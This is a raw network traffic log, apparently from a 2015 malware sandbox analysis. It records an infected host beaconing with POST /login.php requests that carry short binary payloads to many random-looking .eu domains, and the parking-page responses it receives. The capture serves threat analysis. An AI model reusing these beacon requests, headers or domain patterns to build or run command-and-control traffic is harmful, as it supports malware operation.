Cookie: btst=f8b55f9acdb8cb9696d32f18dbcea0d8|194.242.96.218|1448010539|1448010539|0|1|0; snkz=194.242.96.218
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Nov 2015 09:09:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: anbtr=56531f80c1f00a0d974859702a1ece40; domain=.fodakyhijyv.eu
19..Landed fodakyhijyv.eu<br>..0..
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: puregivytoh.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 20 Nov 2015 08:21:33 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.11
Location: hXXp://ww62.puregivytoh.eu
Vary: Accept-Encoding
GET /domain/ciliqikytec.eu HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: sso.anbtr.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 20 Nov 2015 09:09:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: anbtr=f89965e1c0417ff83998ff3762e77e38; domain=.ciliqikytec.eu
Location: hXXp://xsso.ciliqikytec.eu/f89965e1c0417ff83998ff3762e77e38
3e..Go hXXp://xsso.ciliqikytec.eu/f89965e1c0417ff83998ff3762e77e38..0..
GET / HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ww92.qexofyqihid.eu
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 20 Nov 2015 09:09:07 GMT
Server: Apache
Set-Cookie: vsid=923vr1955561476019761; expires=Wed, 18-Nov-2020 09:09:07 GMT; path=/; domain=ww92.qexofyqihid.eu; httponly
X-Frame-Options: DENY
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_lxGQnIqPOObSvpRYhIBExqLbnpqaCDaWB5CI8dJz0yNx3DyRMOZdcOV5tGiCkFN10nldNwse8nilDEMF/BQpMg==
Vary: Accept-Encoding,User-Agent
Content-Length: 1686
Keep-Alive: timeout=5, max=46
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC> <html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_lxGQnIqPOObSvpRYhIBExqLbnpqaCDaWB5CI8dJz0yNx3DyRMOZdcOV5tGiCkFN10nldNwse8nilDEMF/BQpMg==" >..<head>.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>ww92.qexofyqihid.eu</title>.. <style type="text/css">*{margin:0; padding:0; border: 0; overflow:hidden} html, body {height: 100%;}</style>..</head>..<body width="100%" height="100%">..<noscript><meta http-equiv="refresh" content="0;url=hXXp://imptestrm.com/rg-erdr.php?_dnm=ww92.qexofyqihid.eu&_cfrg=1&_drid=as-drid-2396656235494782" /><center><p style="padding:1em; font-size:1.5em;">For search results please <a href="hXXp://imptestrm.com/rg-erdr.php?_dnm=ww92.qexofyqihid.eu&_cfrg=1&_drid=as-drid-2396656235494782" style="text-decoration:underline; color:#0000EE;">CLICK HERE</a>.</p></center></noscript>..<div id="rmgblock" width="100%" height="100%"></div>..<script type="text/javascript" src="hXXp://imptestrm.com/rg-main.php?folio=9POY552X5&dmn=ww92.qexofyqihid.eu"></script>..<script type="text/javascript" language="JavaScript" src="hXXp://pagead2.googlesyndication.com/apps/domainpark/show_afd_ads.js"></script>..<script type="text/javascript"> function collectHeight(){try{var e=Math.max(document.documen
<<< skipped >>>
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lyvejujolec.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 20 Nov 2015 09:08:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://sso.anbtr.com/domain/lyvejujolec.eu
Set-Cookie: btst=921732dff967db654c4cf7d27e59db6c|194.242.96.218|1448010539|1448010539|0|1|0
Set-Cookie: snkz=194.242.96.218
0..
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: pupujeguper.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 20 Nov 2015 08:21:34 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.11
Location: hXXp://ww62.pupujeguper.eu
Vary: Accept-Encoding
GET /519227042aaa4d45b3d8d04c6d6182c2 HTTP/1.1
Host: xsso.vofozymufok.eu
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Cookie: btst=c8d42d911f82f5e93b0d5af0b5bed915|194.242.96.218|1448010539|1448010539|0|1|0; snkz=194.242.96.218
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Nov 2015 09:09:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: anbtr=519227042aaa4d45b3d8d04c6d6182c2; domain=.vofozymufok.eu
19..Landed vofozymufok.eu<br>..0..
GET /bd3d82839c544969cd7e5b6b151fa69e HTTP/1.1
Host: xsso.qeqinuqypoq.eu
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Cookie: btst=aad574aa2a3f3a3a77f150faa40af1c1|194.242.96.218|1448010539|1448010539|0|1|0; snkz=194.242.96.218
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Nov 2015 09:09:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: anbtr=bd3d82839c544969cd7e5b6b151fa69e; domain=.qeqinuqypoq.eu
19..Landed qeqinuqypoq.eu<br>..0..
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: xugiqonenuz.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 200 OK
Connection: close
Set-Cookie: jsessionid=909bfe917d8125c576546cf2675a42ec; Expires=Fri, 18 Nov 2022 09:09:18 GMT
Date: Fri, 20 Nov 2015 09:09:18 GMT
Content-Length: 0
Content-Type: text/plain; charset=utf-8
GET /domain/lyvejujolec.eu HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: sso.anbtr.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 20 Nov 2015 09:09:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: anbtr=be7c0ab0ac1acf15c755867799d818c8; domain=.lyvejujolec.eu
Location: hXXp://xsso.lyvejujolec.eu/be7c0ab0ac1acf15c755867799d818c8
3e..Go hXXp://xsso.lyvejujolec.eu/be7c0ab0ac1acf15c755867799d818c8..0..
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qekikyvutic.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 20 Nov 2015 08:21:48 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.11
Location: hXXp://ww92.qekikyvutic.eu
Vary: Accept-Encoding
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: keraborigin.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Date: Fri, 20 Nov 2015 09:09:43 GMT
Server: Apache/2.4.7 (Ubuntu)
Content-Length: 286
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL /login.php was not found on this server.</p>.<hr>.<address>Apache/2.4.7 (Ubuntu) Server at keraborigin.eu Port 80</address>.</body></html>.....
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: keraborigin.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Date: Fri, 20 Nov 2015 09:09:43 GMT
Server: Apache/2.4.7 (Ubuntu)
Content-Length: 286
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL /login.php was not found on this server.</p>.<hr>.<address>Apache/2.4.7 (Ubuntu) Server at keraborigin.eu Port 80</address>.</body></html>.
GET / HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ww92.rynyhipexon.eu
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 20 Nov 2015 09:09:41 GMT
Server: Apache
Set-Cookie: vsid=905vr1955561817007335; expires=Wed, 18-Nov-2020 09:09:41 GMT; path=/; domain=ww92.rynyhipexon.eu; httponly
X-Frame-Options: DENY
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_XogFpIWeIpJr5PYCNL QDXuaD8wjub0G2TCf1f5AfmcIV/0YQtuvLTHzpln PfYWkIyXNLhB3uNWrDOfYM8xog==
Vary: Accept-Encoding,User-Agent
Content-Length: 1686
Keep-Alive: timeout=5, max=63
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC> <html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_XogFpIWeIpJr5PYCNL QDXuaD8wjub0G2TCf1f5AfmcIV/0YQtuvLTHzpln PfYWkIyXNLhB3uNWrDOfYM8xog==" >..<head>.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>ww92.rynyhipexon.eu</title>.. <style type="text/css">*{margin:0; padding:0; border: 0; overflow:hidden} html, body {height: 100%;}</style>..</head>..<body width="100%" height="100%">..<noscript><meta http-equiv="refresh" content="0;url=hXXp://imptestrm.com/rg-erdr.php?_dnm=ww92.rynyhipexon.eu&_cfrg=1&_drid=as-drid-2396656235494782" /><center><p style="padding:1em; font-size:1.5em;">For search results please <a href="hXXp://imptestrm.com/rg-erdr.php?_dnm=ww92.rynyhipexon.eu&_cfrg=1&_drid=as-drid-2396656235494782" style="text-decoration:underline; color:#0000EE;">CLICK HERE</a>.</p></center></noscript>..<div id="rmgblock" width="100%" height="100%"></div>..<script type="text/javascript" src="hXXp://imptestrm.com/rg-main.php?folio=9POY552X5&dmn=ww92.rynyhipexon.eu"></script>..<script type="text/javascript" language="JavaScript" src="hXXp://pagead2.googlesyndication.com/apps/domainpark/show_afd_ads.js"></script>..<script type="text/javascript"> function collectHeight(){try{var e=Math.max(document.documen
<<< skipped >>>
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lykemujebeq.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 20 Nov 2015 08:21:34 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.4.36-0 deb7u3
Location: hXXp://ww62.lykemujebeq.eu
Vary: Accept-Encoding
GET /domain/jewuqyjywyv.eu HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: sso.anbtr.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 20 Nov 2015 09:09:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: anbtr=71c55851e5901a95263b027885fa0411; domain=.jewuqyjywyv.eu
Location: hXXp://xsso.jewuqyjywyv.eu/71c55851e5901a95263b027885fa0411
3e..Go hXXp://xsso.jewuqyjywyv.eu/71c55851e5901a95263b027885fa0411..0..
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: nojejecebuw.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 20 Nov 2015 09:09:20 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://sso.anbtr.com/domain/nojejecebuw.eu
Set-Cookie: btst=b36799928aa683da3e97e7666bae6fc8|194.242.96.218|1448010560|1448010560|0|1|0
Set-Cookie: snkz=194.242.96.218
0..
GET /domain/tucyguqaciq.eu HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: sso.anbtr.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 20 Nov 2015 09:09:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: anbtr=d1e2832667be3ac8af2587e3c0958424; domain=.tucyguqaciq.eu
Location: hXXp://xsso.tucyguqaciq.eu/d1e2832667be3ac8af2587e3c0958424
3e..Go hXXp://xsso.tucyguqaciq.eu/d1e2832667be3ac8af2587e3c0958424..0..
GET /f89965e1c0417ff83998ff3762e77e38 HTTP/1.1
Host: xsso.ciliqikytec.eu
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Cookie: btst=429cf1fb2eaac1d730774bf27097da95|194.242.96.218|1448010539|1448010539|0|1|0; snkz=194.242.96.218
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Nov 2015 09:09:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: anbtr=f89965e1c0417ff83998ff3762e77e38; domain=.ciliqikytec.eu
19..Landed ciliqikytec.eu<br>..0..
GET / HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ww62.xuqufyduras.eu
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Nov 2015 09:18:48 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Check: 3c12dc4d54f8e22d666785b733b0052100c53444
X-Language: english
X-Template: tpl_CleanPeppermintBlack_twoclick
5f7..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="hXXp://VVV.w3.org/1999/xhtml">..<head>...<title>xuqufyduras.eu</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'xuqufyduras.eu';.var uniqueTrackingID = 'MTQ0ODAxMDU2NC42MDM4OjM1MDBjNzg2MmVhZjA4MDhjZjQ0ZjkzOGE4MmI0YjY1ODAyZDUzYjQxMGQ3MTBhNjUxZGU0M2Y2NjdiNmY0NjE6NTY0ZWUzNDQ5MzZlZA==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var rxid = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='hXXp://parkingcrew.net/assets/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type='text/javascript' language='JavaScript'>themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwMTF8fGJ1Y2tldDA0OHx8fHw1NjRlZTM0NDhiMjY2fHx8MTQ0ODAxMDU2NC42MDk5fGZjYThkMGFmZTdhZTU3NWZkYmViYzZlNzRlNmJkNmQ4NTQxMmQ1MTV8fHx8fDF8fHwwfDU2NGVlMzQ0MTM1MzVmYjUzZThiNTA2M3x8fDB8fHx8fHwwfHx8fHx8fHx8';</script>..</head>..<body>...<script type='text/javascript' language='JavaScript'>.window.onload = function() {..if(clickTracking && typeof track_onclick == 'function') track_onclick("899acbee21dc3d6ea9c8cc64f2f4d6bff340bcc0");..top.location.href = "http:/
<<< skipped >>>
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ciliqikytec.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 20 Nov 2015 09:08:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://sso.anbtr.com/domain/ciliqikytec.eu
Set-Cookie: btst=429cf1fb2eaac1d730774bf27097da95|194.242.96.218|1448010539|1448010539|0|1|0
Set-Cookie: snkz=194.242.96.218
0..
GET / HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ww92.kevedorozup.eu
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 20 Nov 2015 09:09:04 GMT
Server: Apache
Set-Cookie: vsid=918vr1955561445810499; expires=Wed, 18-Nov-2020 09:09:04 GMT; path=/; domain=ww92.kevedorozup.eu; httponly
X-Frame-Options: DENY
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_pCSuho4Rz2cFO6ztB/gVCEwEzGaOY4/zxPU34OpnSoSTVObfw1vkuwKwAjb1u/rzaQ58oMADjyaRB1YttOPnbQ==
Vary: Accept-Encoding,User-Agent
Content-Length: 1686
Keep-Alive: timeout=5, max=104
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC> <html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_pCSuho4Rz2cFO6ztB/gVCEwEzGaOY4/zxPU34OpnSoSTVObfw1vkuwKwAjb1u/rzaQ58oMADjyaRB1YttOPnbQ==" >..<head>.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>ww92.kevedorozup.eu</title>.. <style type="text/css">*{margin:0; padding:0; border: 0; overflow:hidden} html, body {height: 100%;}</style>..</head>..<body width="100%" height="100%">..<noscript><meta http-equiv="refresh" content="0;url=hXXp://imptestrm.com/rg-erdr.php?_dnm=ww92.kevedorozup.eu&_cfrg=1&_drid=as-drid-2396656235494782" /><center><p style="padding:1em; font-size:1.5em;">For search results please <a href="hXXp://imptestrm.com/rg-erdr.php?_dnm=ww92.kevedorozup.eu&_cfrg=1&_drid=as-drid-2396656235494782" style="text-decoration:underline; color:#0000EE;">CLICK HERE</a>.</p></center></noscript>..<div id="rmgblock" width="100%" height="100%"></div>..<script type="text/javascript" src="hXXp://imptestrm.com/rg-main.php?folio=9POY552X5&dmn=ww92.kevedorozup.eu"></script>..<script type="text/javascript" language="JavaScript" src="hXXp://pagead2.googlesyndication.com/apps/domainpark/show_afd_ads.js"></script>..<script type="text/javascript"> function collectHeight(){try{var e=Math.max(document.documen
<<< skipped >>>
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: digusebyvad.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 20 Nov 2015 08:22:15 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.11
Location: hXXp://ww62.digusebyvad.eu
Vary: Accept-Encoding
GET / HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ww92.dimutobihom.eu
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 20 Nov 2015 09:09:00 GMT
Server: Apache
Set-Cookie: vsid=918vr1955561406202917; expires=Wed, 18-Nov-2020 09:09:00 GMT; path=/; domain=ww92.dimutobihom.eu; httponly
X-Frame-Options: DENY
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_Mic7DvRpvetI juA8PXbn52KQPN AbsmtkknMs383riOTAcQmT9M10mpQJ6vSG50WzlfUtULM2gARrNlntDjZA==
Vary: Accept-Encoding,User-Agent
Content-Length: 1686
Keep-Alive: timeout=5, max=116
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC> <html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_Mic7DvRpvetI juA8PXbn52KQPN AbsmtkknMs383riOTAcQmT9M10mpQJ6vSG50WzlfUtULM2gARrNlntDjZA==" >..<head>.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>ww92.dimutobihom.eu</title>.. <style type="text/css">*{margin:0; padding:0; border: 0; overflow:hidden} html, body {height: 100%;}</style>..</head>..<body width="100%" height="100%">..<noscript><meta http-equiv="refresh" content="0;url=hXXp://imptestrm.com/rg-erdr.php?_dnm=ww92.dimutobihom.eu&_cfrg=1&_drid=as-drid-2396656235494782" /><center><p style="padding:1em; font-size:1.5em;">For search results please <a href="hXXp://imptestrm.com/rg-erdr.php?_dnm=ww92.dimutobihom.eu&_cfrg=1&_drid=as-drid-2396656235494782" style="text-decoration:underline; color:#0000EE;">CLICK HERE</a>.</p></center></noscript>..<div id="rmgblock" width="100%" height="100%"></div>..<script type="text/javascript" src="hXXp://imptestrm.com/rg-main.php?folio=9POY552X5&dmn=ww92.dimutobihom.eu"></script>..<script type="text/javascript" language="JavaScript" src="hXXp://pagead2.googlesyndication.com/apps/domainpark/show_afd_ads.js"></script>..<script type="text/javascript"> function collectHeight(){try{var e=Math.max(document.documen
<<< skipped >>>
GET / HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ww62.nozulufynax.eu
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Nov 2015 09:18:49 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Check: 3c12dc4d54f8e22d666785b733b0052100c53444
X-Language: english
X-Template: tpl_CleanPeppermintBlack_twoclick
5f7..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="hXXp://VVV.w3.org/1999/xhtml">..<head>...<title>nozulufynax.eu</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'nozulufynax.eu';.var uniqueTrackingID = 'MTQ0ODAxMDU2NS42Njk3OjQxNzNkNDE0ZTc3YTdhZjMyZDBmY2Y1ODQxZjA4MjlhZjIyMjNkNTE2NzUyYjUzYmRhYTQ0MjJiNGM4MmM4ZWI6NTY0ZWUzNDVhMzg2MQ==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var rxid = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='hXXp://parkingcrew.net/assets/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type='text/javascript' language='JavaScript'>themedata = 